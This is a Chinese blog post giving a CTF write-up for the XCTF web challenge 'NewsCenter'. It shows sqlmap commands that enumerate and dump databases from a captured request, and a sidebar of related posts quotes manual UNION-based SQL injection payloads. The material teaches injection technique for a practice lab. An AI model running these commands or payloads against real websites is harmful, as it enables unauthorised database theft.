XCTF web NewsCenter(sqlmap简单使用)

最新推荐文章于 2024-04-29 01:00:30 发布
最新推荐文章于 2024-04-29 01:00:30 发布
阅读量750 收藏 1
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42172261/article/details/100761288
版权

打开网页是一个查询操作的输入框,判断应该存在sql注入。
随便输入一些东西后回车,用bp抓包,抓取的内容放到一个1.txt文件里面
之后用到sqlmap
sqlmap.py -r 1.txt --dbs 用1.txt内容去搜索对应的所有数据库名
可以爆出两个库
sqlmap.py -r 1.txt -D news --dump 建立可后台news库连接, 搜索所有的数据

sql部分常用参数

参数作用
- -data=“DATA”指明参数是哪些。例:-u “www.test.com/index.php?id=1” --data=“name=1&pass=2”
- -dbs目标服务器中有什么数据库,常用,直接用- -dbs
- -tables目标数据库有什么表,常用,直接用- -tables
- -columns目标表中有什么列,常用,直接用- -colums
-r可以将一个post请求方式的数据包保存在一个txt中。例: -r 1.txt
- -dump查询指定范围的全部数据
-D直接连目标后端接数据库
- -is-dba查看是否是管理员权限
- -current-db当前数据库
- -current-user当前用户
-T指定要列出字段的表
- -batch从不询问用户输入,使用所有默认配置
- -delay 0.2延迟参数 这个很重要

sqlmap通常的使用步骤

1.Sqlmap -u url --dbs 显示数据库管理系统中所有数据库
2.Sqlmap -u url --current -db 当前网站所使用得数据库
3.Sqlmap -u url -D 数据库名 --tables 显示当前数据库中所有数据表
4.Sqlmap -u url -D 数据库名 -T 表名 --columns 显示表中所有得字段名
5.Sqlmap -u url -D 数据库名 -T 表名 -C 字段名,字段名,字段名…(互相用逗号隔开) --dump 显示数据

H4ppyD0g
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
XCTF攻防世界web.doc
09-19
XCTF攻防世界Web WriteUp】 在网络安全竞赛中,CTF(Capture The Flag)是一种常见的形式,其中“XCTF攻防世界”是一个专注于Web安全的平台,旨在帮助参与者提升网络安全技能,特别是Web应用的安全防御和攻击能力...
【CTF】CTF课后习题WP
lucasde的博客
12-13 699
靶机:10.14.3.122直接访问,发现无法访问。第一个我抓包用xff改成本机地址,发现没用,排除,第二个直接拿nmap去扫这个靶机直接就排除第二个不对,直接就找出是第三个原因了,直接访问8888这个端口。
ctf-攻防世界-webNewsCenter
一只菜鸟的博客
11-10 3358
打开环境,功能点只有一个查找新闻,猜测是sql注入 一.手工注入 从最基础的联合查询注入开始 1正常 1'报错 1' '正常 猜测为字符型注入,单引号闭合 1' order by 1,2,3 ;' 正常 1' order by 1,2,3,4 ;'报错 可见一共3列 (;将前后语句分开,'闭合后面的语句,也可以用#注释掉后面的语句) 1' union select 1,2,3;' 页面显示2和3,则2和3为显示...
XCTF-攻防世界CTF平台-Web类——7、NewsCenter(SQL注入)
Onlyone_1314的博客
11-19 1745
目录标题手工注入information_schema.columns 学习sqlmap工具注入: 打开题目地址: 只有一个搜索框,下面是几条消息,上面输入关键词可以搜索这几条消息,可能就是存在SQL注入漏洞: 在后面加入’ or '1 = 1恒成立的判定条件: a ' or '1 = 1 搜索结果变成了所有的消息,应该就是存在SQL注入 手工注入 之后我们在后面拼接order by,来查看表中有多少列,查询结果按照前1列排序(第一个’闭合后台命令的第一个’,#注释掉后台的第二个’): ' order
CTF 刷题记录(一) 白云新闻搜索(手动与自动化SQL注入)
qq_29566629的博客
07-27 6473
题目 给出的靶机如下: 解题思路 首先判断这是考察哪个知识点,只有一个输入框,题目中又说到入侵,首先考虑sql注入,下面介绍手工和自动化注入两种方式 (1)手工注入 先随便输入几个值,发现只有在值等于“内容”时有返回结果,其他关键字均没有结果,但是会有会先如下: 用“ ’ ”来探测是否能接受特殊字符以及是否存在注入点,结果如图: 很显然,存在前台的js代码在控制输入的字符,找到这个网页的js代码,如下: 代码把所有的特殊字符都换成了空字符。 现在要做的就是就是先把这个网站的js代码停用,如下图:
CTF--白云新闻搜索
qq_70288605的博客
04-19 423
接着输入’ union select 1,TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA.tables – ’在网站输入英文 ' (英文单引号)符号,发现弹窗提示不允许输入特殊符号,因此我们可以禁用JavaScript,再浏览器设置里找到,并将该地址加入。然后构造下面的语句 ’ union select 1,2,flag from admin – ’测试是否能进行sql注入,输入永真式。发现存在flag关键字。
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 ...由于我的电脑上没有Windows的开发环境,使用python写个程序 发送成功 程序变成这个样子 计算flag 得到flag:thIs_Is_real_kEy_hahaaa 作者:夏了茶糜
web 2.11 upload1.md
12-16
xctf
圣徒xctf网站
02-14
圣徒xctf网站概述SaintsXCTF Web应用程序的前端。 这是SaintsXCTF Web应用程序的第二个版本。 前端使用React.js编写,并使用Sass进行样式设置。 API调用通过Nginx代理路由到 。指令在本地启动应用程序首次设置应该...
CTF-WEB篇 攻防世界题目实战解析NewsCenter
最新发布
2301_76565920的博客
04-29 295
题目:NewsCenter 难度:2。sql注入,union的使用
攻防世界web进阶news center
gongjingege的博客
07-11 363
burp suite抓包,sqlmap注入 打开链接 有一个搜索框,随意输入写数字,没有变化,用bp抓包试一下,也没有发现,看了看大佬的wp,才知道考sql注入。。。。 看了下是post,所以然后保存在桌面,123.txt 然后用sqlmap注入(这方面我也不太会。。。) 1,查找数据库 -r C:\Users\123\Desktop\123.txt --dbs 发现有两个数据库 推测应该是news 2,查找news下的表 -r C:\Users\123\Desktop\123.txt --
CTF中Web各种题目的解题姿势
05-25
Web题型是CTF中常考题型之一,它将实际渗透过程中的技术技巧转化为CTF赛题,主要考察选手在Web渗透技术方面的能力,由于Web渗透涉及的知识点较多,知识面比较广泛,因此系统的总结和练习Web类题,是快速掌握出题人思路的一种有效的方法。
XCTF题目使用sqlmap解决NewsCenter
daqiangdetianxia的博客
07-05 335
sqlmap -u http://220.249.52.133:48920/ --data search=‘Hello’ -dbs -v 0 sqlmap -u http://220.249.52.133:48920/ --data search=‘Hello’ -dbs -v 0 -D nws --tables sqlmap -u http://220.249.52.133:48920/ --data search=‘Hello’ -dbs -v 0 -D news --tables -T secret.
XCTF攻防世界web进阶练习_ 1_NewsCenter
silence1_的博客
04-30 3051
XCTF攻防世界web进阶练习—NewsCenter 题目 题目是NewsCenter,没有提示信息。 打开题目,有一处搜索框,搜索新闻。考虑xss或sql注入,随便输入一个abc,没有任何搜索结果,页面也没有什么变化,考虑SQL注入。 随便输入123,用burp抓包,发现是post方式,因为sql注入技术太菜,直接用sqlmap爆破。 将http头保存为1.txt,试试用sqlmap爆数据库 ...
XCTF-高手进阶区:NewsCenter
1stPeak's Blog
06-13 3195
XCTF-高手进阶区:NewsCenter
攻防世界 - NewsCenter - WriteUp
热门推荐
哒君的博客
06-08 1万+
NewsCenter 这一题考察的是 SQL 注入 首先用 ' and 0 union select 1,2,3 # 来初步判断该sql查询返回三列数据 然后用 ' and 0 union select 1,TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA.COLUMNS # 得到表名,很明显我们需要得到 secret_table 表中的内容 再用 ...
XCTF攻防世界-NewsCenter-SQL简单注入-sqlmap注入
MJosek博客
03-23 1204
题目地址:https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=1&id=4686&page=1 我们进入页面 观察界面我们考虑到是sql注入 这里我们演示的是sqlmap的注入方法 首先我们页面的post请求进行抓包操作 ...
ctf随笔(4) 简单sql注入
ma_nong_的博客
10-16 410
一个新闻搜索的页面,在“search news”中输入搜索的字符,可以在下列新闻匹配到相应的字符 于是就可以有两种方式尝试注入,手工注入
xctf-web-NewsCenter
Spwpun的博客
03-30 2251
一个无报错回显的注入漏洞,明明一个很简单的sql注入题,我却花一个小时来做,服了自己了,依赖于sqlmap我从来没尝到甜头过,还是得对information_schema表结构有一定的理解: 查询当前数据库中的所有表名: 1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_...
前端漏洞利用:Web 2.11 文件上传绕过策略
在这个关于Web安全的挑战中,"web 2.11 upload1.md" 文件详细讲述了在XCTF竞赛环境中如何利用前端上传漏洞进行攻击的过程。首先,参赛者遇到一个前端限制,只能上传jpg或png格式的文件,这提示了存在一种基于格式...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

H4ppyD0g

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值